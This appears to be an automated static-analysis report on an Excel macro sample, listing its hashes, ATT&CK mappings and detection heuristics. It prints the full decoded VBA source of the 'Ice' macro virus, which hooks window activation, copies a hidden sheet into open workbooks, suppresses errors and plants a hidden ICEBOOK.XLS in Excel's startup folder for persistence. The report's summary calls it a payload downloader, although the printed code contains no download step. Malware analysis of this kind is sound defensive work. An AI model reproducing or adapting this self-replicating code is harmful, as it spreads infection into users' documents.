Xls.Dropper.Agent-1633146 — Office (OLE) malware analysis

Static analysis result for SHA-256 d567d6b6121065f2…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 28.0 KB
Created: 2014-04-29 05:09:33
Authoring application: Microsoft Excel
First seen: 2015-02-17
MD5: c26e811b04f27f1e71719a365256cf59
SHA-1: 94822660570f5e27d92c81a6660b5bac4f52033e
SHA-256: d567d6b6121065f2f4651f98e32dcd4228128c208cd66329b1906e0ae35b1c45
Risk score: 88

Malware Insights

Xls.Dropper.Agent-1633146 · confidence 95%

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic)
T1566.001 (Phishing: Spearphishing Attachment)

This Excel document contains a VBA macro that is triggered by the 'auto_open' subroutine. The macro attempts to save a copy of itself as 'ICEBOOK.XLS' in the Excel startup path, and then appears to prepare for further execution. The ClamAV detection name 'Xls.Dropper.Agent-1633146' strongly suggests this is dropper malware designed to download and execute a secondary payload.

Heuristics (3)

  • ClamAV: Xls.Dropper.Agent-1633146 (severity: critical, rule CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Dropper.Agent-1633146
  • VBA macros detected (severity: medium, rule OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (severity: low, rule OLE_VBA_AUTO)
    Matched line in script: Sub auto_open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1837 bytes
SHA-256: 816984d0f10020575f5559f5cdef52179027d4e8a6550d76bc0024307aa7f767

Extracted script (first 1,000 lines shown):
Attribute VB_Name = "Ice"

' Ice-LC's work! Do you like it?
' 25 Jan 1999. Happy Students' Day!
' Bon voyage!

' Runs automatically when the workbook is opened. Rather than acting directly,
' it registers ice_action as the handler Excel invokes whenever a window is
' activated, so the routine below fires repeatedly during the session.
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
  Application.OnWindow = "ice_action"
End Sub

Sub ice_action()
Attribute ice_action.VB_Description = "0"
Attribute ice_action.VB_ProcData.VB_Invoke_Func = " \n14"
  Dim c As String, ab As String, newname As String
  Dim ib As Integer, wb As Integer, i As Integer
  
  ' Suppress all runtime errors so every step fails silently.
  On Error Resume Next
    
  ' ib = 1 if ICEBOOK.XLS already sits in the Excel startup folder (XLSTART).
  c$ = Application.StartupPath
  If Dir(c$ & "\" & "ICEBOOK.XLS") = "ICEBOOK.XLS" Then ib = 1 Else ib = 0
  ' wb = 2 if the active workbook already carries the "Ice" macro module.
  wb = 0
  For i = ActiveWorkbook.Modules.Count To 1 Step -1
    If ActiveWorkbook.Modules(i).name = "Ice" Then
      wb = 2
      Exit For
    End If
  Next i
    
  ab$ = ActiveWorkbook.name
  ' ib + wb: 0 = nothing present, 3 = both present; in either case do nothing.
  Select Case ib + wb
    ' Case 1: ICEBOOK.XLS is in the startup folder but the active workbook is
    ' clean, so copy the hidden "Ice" sheet from ICEBOOK.XLS into it.
    Case 1
      Application.ScreenUpdating = False
      Workbooks("ICEBOOK.XLS").Sheets("Ice").Copy before:= _
          Workbooks(ab$).Sheets(1)
      Workbooks(ab$).Sheets("Ice").Visible = False
      Application.ScreenUpdating = True
    ' Case 2: the active workbook carries "Ice" but no ICEBOOK.XLS exists yet.
    ' Copy the sheet to a new workbook, blank its document properties, hide the
    ' window, and save it as ICEBOOK.XLS in the startup folder so that it is
    ' loaded at every subsequent Excel start.
    Case 2
      Application.ScreenUpdating = False
      Sheets("Ice").Visible = True
      Sheets("Ice").Copy
      With ActiveWorkbook
        .title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
      End With
      newname$ = ActiveWorkbook.name
      ActiveWindow.Visible = False
      Err = 0
      Workbooks(newname$).SaveAs Filename:=c$ & "\" & _
          "ICEBOOK.XLS", FileFormat:=xlNormal, Password:="", _
          WriteResPassword:="", ReadOnlyRecommended:=False, _
          CreateBackup:=False
      ' If the save succeeded, re-point the window hook at the startup copy.
      If Err = 0 Then Application.OnWindow = "icebook.xls!ice_action"
      Sheets("Ice").Visible = False
      Application.ScreenUpdating = True
  End Select
End Sub